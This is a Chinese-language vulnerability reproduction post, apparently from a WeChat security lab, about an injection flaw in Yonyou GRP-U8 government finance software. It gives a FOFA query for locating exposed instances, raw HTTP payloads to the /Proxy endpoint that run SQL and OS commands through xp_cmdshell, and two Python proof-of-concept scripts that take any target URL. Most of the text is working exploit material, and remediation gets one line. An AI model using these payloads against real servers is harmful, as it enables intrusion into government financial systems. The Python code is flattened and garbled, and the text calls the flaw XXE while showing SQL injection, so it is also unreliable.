一、漏洞介绍
用友GRP-U8行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。用友GRP-u8被曝存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有限制外部实体的加载,导致可加载恶意外部文件,可以执行SQL语句,甚至可以执行系统命令。
二、影响版本
GRP-U8
三、漏洞复现
1.环境搭建
fofa语法
title="GRP-U8"
2.漏洞复现
(1):执行SQL语句payload
POST/Proxy HTTP/1.1
Host: xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=25EDA97813692F4D1FAFBB74FD7CFFE0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 386
cVer=9.8.0&dp=<?xml version="1.0"encoding="GB2312"?><R9PACKETversion="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATAformat="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATAformat="text">select@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
(2):执行SQL语句脚本
import reimport requestsimport sysiflen(sys.argv) !=2:print("Usage: python poc.py url")print("example: python poc.py http://127.0.0.1:8080")sys.exit(1)url = sys.argv[1]headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36","Content-Type":"application/x-www-form-urlencoded",}def poc(url):url = url +'/Proxy'print(url)data ='cVer=9.8.0&dp=<R9PACKETversion="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATAformat="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATAformat="text">select@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'res = requests.post(url,headers=headers,data=data)res = res.textresult_row =r'<ROW COLUMN1="(.*?)"'ROW = re.findall(result_row,res,re.S| re.M)print(ROW[0])if__name__=="__main__":poc(sys.argv[1])
(3):使用方法
python3GRP-U8.py url
(4):执行命令payload
POST/Proxy HTTP/1.1
Host: xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=25EDA97813692F4D1FAFBB74FD7CFFE0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 357
cVer=9.8.0&dp=<?xml version="1.0"encoding="GB2312"?><R9PACKETversion="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATAformat="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATAformat="text">exec xp_cmdshell'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
(5):执行命令脚本
import reimport requestsimport sysiflen(sys.argv) !=2:print("Usage: python poc.py url")print("example: python poc.py http://127.0.0.1:8080")sys.exit(1)url = sys.argv[1]headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36","Content-Type":"application/x-www-form-urlencoded",}def poc(url):url = url +'/Proxy'print(url)data ='cVer=9.8.0&dp=<R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATAformat="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATAformat="text">exec xp_cmdshell"whoami"</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'res = requests.post(url,headers=headers,data=data)res = res.textresult_row =r'<ROW output="(.*?)"'ROW = re.findall(result_row,res,re.S| re.M)print(ROW[0])if__name__=="__main__":poc(sys.argv[1])
(6):使用方法
python3GRP-U8.py url
四、修复建议
1.升级到安全版本
本文始发于微信公众号(零度安全攻防实验室):用友GRP-U8SQL注入&远程代码执行漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论